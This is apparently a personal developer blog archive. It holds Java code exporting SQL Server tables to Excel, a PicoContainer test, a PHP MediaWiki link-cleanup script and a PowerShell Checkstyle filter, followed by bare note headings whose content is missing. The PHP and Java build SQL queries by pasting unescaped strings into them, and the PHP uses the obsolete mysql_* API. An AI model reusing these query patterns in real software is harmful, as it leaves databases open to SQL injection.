      for (String filed : fields.split(",")) {
        list.add(filed.trim());
      }
      map.put(table, list);
    }

    for (String key : map.keySet()) {
      out.println("table: " + key + ", " + map.get(key));
    }
    reader.close();

    genData(db, map, only_chinese);
  }

  static void genData(String db, Map<String, List<String>> map,
      boolean only_chinese) {
    Connection conn = null;

    try {
      conn = DriverManager
          .getConnection("jdbc:sqlserver://DbServer:1433;integratedSecurity=true;DatabaseName="
              + "Public_" + db);
    } catch (SQLException e) {
      e.printStackTrace();
    }

    HSSFWorkbook wb = new HSSFWorkbook();
    HSSFFont f = wb.createFont();
    f.setFontHeightInPoints((short) 12);
    // f.setColor(HSSFColor.RED.index);
    f.setBoldweight(HSSFFont.BOLDWEIGHT_BOLD);

    HSSFCellStyle cs = wb.createCellStyle();
    cs.setFont(f);

    int tables = 0;
    for (String table : map.keySet()) {
      listField(table, map.get(table), wb, cs, conn, only_chinese);
      tables++;
    }
    out.println("共有" + tables + "个表的数据输出。");

    try {
      String fileName = db + ".xls";
      if (only_chinese) {
        fileName = db + "-only-chinese.xls";
      }

      FileOutputStream out = new FileOutputStream(fileName);
      wb.write(out);
      out.close();
    } catch (Exception e) {
      e.printStackTrace();
    }

    try {
      conn.close();
    } catch (SQLException e) {
      e.printStackTrace();
    }
  }

  static void listField(String table, List<String> options, HSSFWorkbook wb,
      HSSFCellStyle cs, Connection conn, boolean only_chinese) {

    HSSFSheet sheeet = wb.createSheet(table);
    int row_index = 0;
    HSSFRow row = sheeet.createRow(row_index++);
    for (int i = 0; i < options.size(); i++) {
      HSSFCell cell = row.createCell(i);
      cell.setCellValue(options.get(i));
      cell.setCellStyle(cs);
    }

    String selectOption = "";
    for (int i = 0; i < options.size() - 1; i++) {
      selectOption += options.get(i) + ",";
    }
    selectOption += options.get(options.size() - 1);

    Statement stmt;
    // 检查是否有中文
    final String regexp = "[\u4e00-\u9fa5]+";
    final Pattern pattern = Pattern.compile(regexp);

    try {
      stmt = conn.createStatement();
      ResultSet rs = stmt.executeQuery("select " + selectOption
          + " from " + table);
      int limit = 65534;
      boolean needCreate = false;
      int sheetIndex = 2;
      while (rs.next()) {
        if (row_index > limit && row_index <= limit * 2) {
          needCreate = true;
          if (sheetIndex >= 5) {
            out.println("table: " + table + " 超出最大数量" + sheetIndex
                + "，不再计算");
            break;
          }
        }

        if (needCreate) {
          out.println("table: " + table + "(" + sheetIndex + ")"
              + " 生成");
          sheeet = wb.createSheet(table + "(" + sheetIndex + ")");
          sheetIndex++;
          row_index = 1;
          needCreate = false;
        }

        if (only_chinese) {
          boolean hasChinese = false;

          for (int i = 0; i < options.size(); i++) {
            String value = rs.getString(i + 1);
            if (value != null)
              if (pattern.matcher(value).find()) {
                hasChinese = true;
                break;
              }
          }
          if (hasChinese) {
            row = sheeet.createRow(row_index++);
            for (int i = 0; i < options.size(); i++) {
              String value = rs.getString(i + 1);
              HSSFCell cell = row.createCell(i);
              cell.setCellValue(value);
            }
          }
        } else {
          row = sheeet.createRow(row_index++);
          for (int i = 0; i < options.size(); i++) {
            String value = rs.getString(i + 1);
            HSSFCell cell = row.createCell(i);
            cell.setCellValue(value);
          }
        }
      }
    } catch (SQLException e) {
      e.printStackTrace();
    }
  }

  static void xlsTest() throws Exception {
    HSSFWorkbook wb = new HSSFWorkbook();

    HSSFSheet s = wb.createSheet("sheet1");

    HSSFFont f = wb.createFont();
    f.setFontHeightInPoints((short) 12);
    f.setColor(HSSFColor.RED.index);
    f.setBoldweight(HSSFFont.BOLDWEIGHT_BOLD);

    HSSFCellStyle cs = wb.createCellStyle();
    cs.setFont(f);

    // Define a few rows
    for (short rownum = (short) 0; rownum < 30; rownum++) {
      HSSFRow row = s.createRow(rownum);
      for (short cellnum = (short) 0; cellnum < 10; cellnum += 2) {
        HSSFCell cell2 = row.createCell(cellnum + 1);

        cell2.setCellValue(new HSSFRichTextString("Hello! " + cellnum));
        cell2.setCellStyle(cs);
      }
    }

    // Save
    FileOutputStream out = new FileOutputStream("workbook.xls");
    wb.write(out);
    out.close();
  }

  static void getMessageTest() throws Exception {
    Connection conn = null;

    final String regexp = "[\u4e00-\u9fa5]+";
    final Pattern pattern = Pattern.compile(regexp);

    try {
      conn = DriverManager
          .getConnection("jdbc:sqlserver://DbServer:1433;integratedSecurity=true;DatabaseName="
              + "Public_X");

      Statement stmt = conn.createStatement();
      ResultSet rs = stmt
          .executeQuery("select dbo.big5ISOToUnicode(dbo.UnicodeToGbkISO(message)) from X where id = 4775");
      while (rs.next()) {
        String value = rs.getString(1);
        out.println("<< " + value);
        if (pattern.matcher(value).find()) {
          out.println("find it...");
        }

      }

      rs.close();
      stmt.close();
      conn.close();
    } catch (SQLException e) {
      e.printStackTrace();
    }
  }

  public static void main(String[] args) throws Exception {
    run("XDataBase", false); // show all
    run("XDataBase", true);  // only chinese character
    // getMessageTest();
  }
}

build.xml

<project default="run">
  <target name="run">
    <java classname="jay.CheckData" fork="yes">
      <classpath>
        <fileset dir="poi-3.7">
          <include name="poi-3.7-20101029.jar" />
          <include name="poi-scratchpad-3.7-20101029.jar" />
        </fileset>
        <path location="sqljdbc4.jar" />
        <path location="bin" />
      </classpath>
      <jvmarg value="-Xms1024m" /> <!-- 数据较多，需要设置大内存，用Event model可能会更好 -->
      <jvmarg value="-Xmx1024m" />
      <jvmarg value="-Djava.library.path=E:\Software\JAVA\SQL" />
    </java>
  </target>
</project>

2011-03-29

2011-03-29

picoContainer的字段注入

package test;

import static org.picocontainer.injectors.NamedFieldInjection.injectionFieldNames;

import java.util.ArrayList;
import java.util.Collection;

import javax.persistence.EntityManager;
import javax.persistence.Persistence;

import junit.framework.TestCase;

import org.picocontainer.DefaultPicoContainer;
import org.picocontainer.injectors.NamedFieldInjection;


public class TestAssignment
    extends TestCase
{
  static EntityManager em = Persistence.createEntityManagerFactory("x_system").createEntityManager();

  DefaultPicoContainer pico = new DefaultPicoContainer(new NamedFieldInjection());


  @Override
  protected void setUp()
      throws Exception
  {
    em.getTransaction().begin();
    pico.addComponent(em);
  }


  @Override
  protected void tearDown()
      throws Exception
  {
    em.getTransaction().commit();
  }


  public void testBatchMark()
  {
    pico.as(injectionFieldNames("em")).addComponent(A.class);
    pico.as(injectionFieldNames("em", "a")).addComponent(B.class);
    pico.as(injectionFieldNames("em", "b")).addComponent(C.class);
    C cBean = pico.getComponent(C.class);
    Collection<X> xs = new ArrayList<X>();

    cBean.someMethod("test", xs);
  }
}

2011-02-24

2011-02-24

MediaWiki的标题和链接处理

<?php
function showTitle($title){
    $title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
    $sql = "SELECT page_title FROM  `page` WHERE  `page_title` LIKE  '%$title%'";
    $result = mysql_query( $sql );
    while ( $line = mysql_fetch_array( $result ) ) {
        echo iconv('utf-8', 'gbk', $line[0]) . "\n";
    }
    mysql_free_result( $result );

    echo "-------------------------- \n";
    /*$sql = "SELECT pl_from, pl_title FROM  `pagelinks` WHERE  `pl_title` LIKE  '%$title%'";
    $result = mysql_query( $sql );
    while ( $line = mysql_fetch_array( $result ) ) {
        echo $line[0] . " -> " . iconv('utf-8', 'gbk', $line[1]) . "\n";
    }
    mysql_free_result( $result );*/
}

function findDeadLinks($title){
    $title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
    $sql = "SELECT page_title FROM `page` p, revision r, text t WHERE page_latest = r.rev_id and r.rev_text_id = t.old_id and old_text like '%$title%'";
    $result = mysql_query( $sql );
    while ( $line = mysql_fetch_array( $result ) ) {
        echo 'http://witube.hkma.org.gz/index.php?title=' . iconv('utf-8', 'gbk', $line[0]) . "\n";
    }
    mysql_free_result( $result );
}

function deleteTitle($title){
    $title = iconv('gbk', 'utf-8', str_replace(' ', '_', $title));
    $sql = "delete FROM `pagelinks` WHERE  `pl_title` = '$title'";
    mysql_query( $sql );
    echo "Record Deleted: " . mysql_affected_rows() . "\n";
}

function main(){
    $link = mysql_connect( 'Server', 'wiki', 'passwd' ) or die( 'Could not connect' . mysql_error() );
    mysql_select_db( 'wiki' );
    //deleteTitle('规范参考/技术类/语法检查/CheckStyle/AbstractBase/公共属性列表');

    $handle = fopen("Noname2", "r");
    while (!feof($handle)) {
        $item = fgets($handle);
        $item = str_replace("\r\n", '', $item);
        echo $item . "\n";
        deleteTitle($item);
    }
    fclose($handle);
    
    /*$title = "ruts2Adapter替换I18nStrut";
    showTitle($title);*/
    //findDeadLinks('规范参考/技术类');
    mysql_close( $link );
}
main()
?>

2011-02-14

2011-02-14

利用PowerShell截取Checkstyle关于bSpell拼写检查的当前错误行的源文件内容

ps1

go{

    $gbk = [System.Text.Encoding]::GetEncoding("GBK")
    $utf8 = [System.Text.Encoding]::UTF8

    $result = 'spell-filter.txt'
    $encoding = [System.Text.Encoding]::GetEncoding("GBK")
    rm $result -ea SilentlyContinue
    $xml = cat checkstyle.xml
    $xml = [xml]$xml  # 类型转换
    $xml.checkstyle.file|%{$_.error}|?{$_.source -match 'SpellCheck'}|
    %{
      $fileContent = cat $_.parentNode.name -total $_.line -ea SilentlyContinue # 文件有可能不存在，所以要【静音】
      $word = (($_.message -replace 'The Spelling of word ', '') -replace 'may be illegal. .*', '') # 错误的拼写内容

      if ($fileContent -ne $Null){
        $code = $gbk.GetBytes($fileContent[-1]) # 错误的代码行
        $code = $utf8.GetString($code)
        '文件: ' + $_.parentNode.name + ' ,行号：' + $_.line + ' ,拼写错误：' +  $word + ' ,代码：' + $code>> $result
      }else{
        '不存在的文件： ' + $_.parentNode.name + ' , ' + $_.line + ' , ' +  $word 
      }
    }
}

go

checkstyle.xml

<?xml version="1.0" encoding="UTF-8"?>
<checkstyle version="5.0">
<file name="package_zh_CN.properties">
<error line="114" column="81" severity="error" message="The Spelling of word &quot;pageing&quot; may be illegal. The suggestion(s) include(s): [paging, ageing, panging, pugging, pegging]" source="SpellCheck"/>
<error line="117" column="84" severity="error" message="The Spelling of word &quot;pageing&quot; may be illegal. The suggestion(s) include(s): [paging, ageing, panging, pugging, pegging]" source="SpellCheck"/>
</file>
<file name="addOrDel.js">
<error line="1" severity="info" message="File length is 2,373 lines (max allowed is 2,000)." source="com.puppycrawl.tools.checkstyle.checks.sizes.FileLengthCheck"/>
</file>
<file name="showDataDictDetail.jsp">
<error line="10" column="19" severity="error" message="The Spelling of word &quot;stylesheet&quot; may be illegal. The suggestion(s) include(s): [StyleSheet]" source="SpellCheck"/>
</file>
</checkstyle>

Starship (~/.config/starship.toml)

Scoop installed apps (~\scoop\shims)

Powershll $PROFILE

Scripts

synchronize argocd (sy)

set image (si)

build Jenkins (bu)

build process in Jenkins (bp)

show logs for k8s pod (po)

Publish/upload artifacts with Gradle or curl

Using sock5 proxy to clone git repo

A very prilimiary project for proof of concept on following items,

Prerequisites

JDK 11+

Gradle 6.8

NodeJS v14

H2 DB v1.4.199

MariaDB Server 10.6 (Optional)

Docker Desktop (Optional)

To setup the environment and run the demo

Add below entry at C:\Windows\System32\drivers\etc\hosts

MariaDB (Optional)

H2 DB

Redis

Go to session-service directory and run below script in command prompt

Go to login-service directory and run below script in command prompt

Go to profile-service directory and run below script in command prompt

Go to frontend directory and run below script in command prompt

The project is also able to build and run with docker

Test the application

Next…

Fix problem of PullImageErr even successfully validate new docker image from external registry for deployment

Add imagePullSecret under below YAML

Or run following script

Redeploy images from repo.lab.company.com

Check service account

Create deployment

Fix: ORA-01194: file 1 needs more recovery to be consistent

Got 3 files from https://www.sslforfree.com/

Web server is tomcat, merge those files into a keystore

Test the cert

generate certitficate signing request

print certificate request

sign jnlp jar

Reference

Import certificate

Add key entry to xxx_signing.jks for pdf signing

jks location

generate private key

generate public certificate for domain of dummy.gov.hk

re-generate csr with same private key

generate private key for internal certificate for domain of *.dummy.hksarg

generate 3 internal certificates for domain of *.dummy.hksarg by one private key

convert p7b cert format to PEM

conbime cert and cacert

Export some dependencies like org.dom4j and javax.jms.api in jboss-deployment-structure.xml

Add application user for role keyservice_admin by calling bin/add-user.bat

Update standalone.conf to add RM config path

Generate key store

Add support for HKPOST_TRIAL cert for testing in webserver.properties

Payment and Payment Reconciliation

Keystore

Install unlimited strength JCE policy files named local_policy.jar and US_export_policy.jar at \lib\security

paymentclient_web -> IApp1/2, paymentrecon-portal_web, paymentrecon-dept_web -> GApp1/2

Encounter error code 0x800f0831, that means missing some security patch before installing current windows update.

To repairing system and servicing health by running

Reference

DocSignController.java

JS for PDF signing

following code writtern was studied by the result from openssl asn1parse -inform pem -in pkcs7-hash.pem

forge.js was hacked by adding following code

AuthenticationApplet.java (itext for PDF signing), below code is as the reference for study on PDF signing with js

Reference

List all VM flags

JAVA_OPTS settings for OpenJDK 11

Profiling commands

Reference

Environment setup

Start enthereum client (or you can install geth-windows-386-1.8.13-225171a4.exe)

Compile and deploy contract

Install minidlna by `sudo apt-get install minidlna`

Install the command line media player by `sudo apt-get install omxplayer`, then play the music from ssh command line.